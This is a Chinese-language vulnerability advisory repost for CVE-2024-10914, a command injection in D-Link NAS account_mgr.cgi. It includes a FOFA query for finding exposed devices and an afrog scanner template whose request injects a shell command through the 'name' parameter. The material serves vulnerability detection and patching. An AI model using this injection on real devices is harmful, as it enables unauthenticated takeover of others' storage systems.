D-Link NAS account_mgrcgi远程命令执行漏洞

漏洞信息

漏洞名称: D-Link NAS account_mgr.cgi远程命令执行漏洞

漏洞编号:

  • CVE: CVE-2024-10914

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: D-Link NAS设备是一款网络附加存储设备,广泛应用于家庭和小型企业环境中,用于数据存储和共享。该设备提供了一个名为account_mgr.cgi的接口,用于管理用户账户。由于该接口未对用户输入进行充分验证,导致存在命令注入漏洞。攻击者可以通过构造特制的HTTP请求,利用此漏洞在设备上执行任意系统命令,无需任何身份验证。这种漏洞的利用可能导致攻击者完全控制受影响的设备,包括写入后门文件、获取服务器权限等严重后果。由于该漏洞的利用门槛低,且影响范围广,因此被评定为严重级别。企业用户应立即检查其D-Link NAS设备的版本,并尽快应用厂商提供的安全补丁,以防止潜在的安全风险。

产品厂商: D-Link

产品名称: D-Link NAS

影响版本: DNS-320 1.00, DNS-320LW 1.01.0914.2012, DNS-325 1.01, DNS-325 1.02, DNS-340L 1.08

搜索语法: app=”D_Link-DNS-ShareCenter”

来源: https://github.com/zan8in/afrog/blob/89bfabcff982e1109bcaa6ece0d23f5105497a67/pocs%2Fafrog-pocs%2FCVE%2F2024%2FCVE-2024-10914.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

id: CVE-2024-10914

info:
name: D-Link NAS account_mgr.cgi存在远程命令执行
author: zan8in
severity: critical
verified: true
description: |-
D-Link NAS设备的/cgi-bin/account_mgr.cgi接口处存在命令注入漏洞,未经身份验证的攻击者通过特制的HTTP请求可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
fofa: app="D_Link-DNS-ShareCenter"
affected: |-
DNS-320 1.00
DNS-320LW 1.01.0914.2012
DNS-325 1.01
DNS-325 1.02
DNS-340L 1.08
reference:
- https://mp.weixin.qq.com/s/UILrkEAsD1CYlqEhbH9QZQ
tags: dlink,cve,cve2024,rce,nas
created: 2024/11/18

set:
hostname: request.url.host
command: "ifconfig"
rules:
r0:
request:
raw: |-
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
expression: |
response.status == 200 && response.body.bcontains(b'inet addr:') && response.body.ibcontains(b'Mask:') && response.body.bcontains(b"Content-type: text/html")
expression: r0()



D-Link NAS account_mgrcgi远程命令执行漏洞
http://example.com/2025/07/30/github_1635046005/
作者
lianccc
发布于
2025年7月30日
许可协议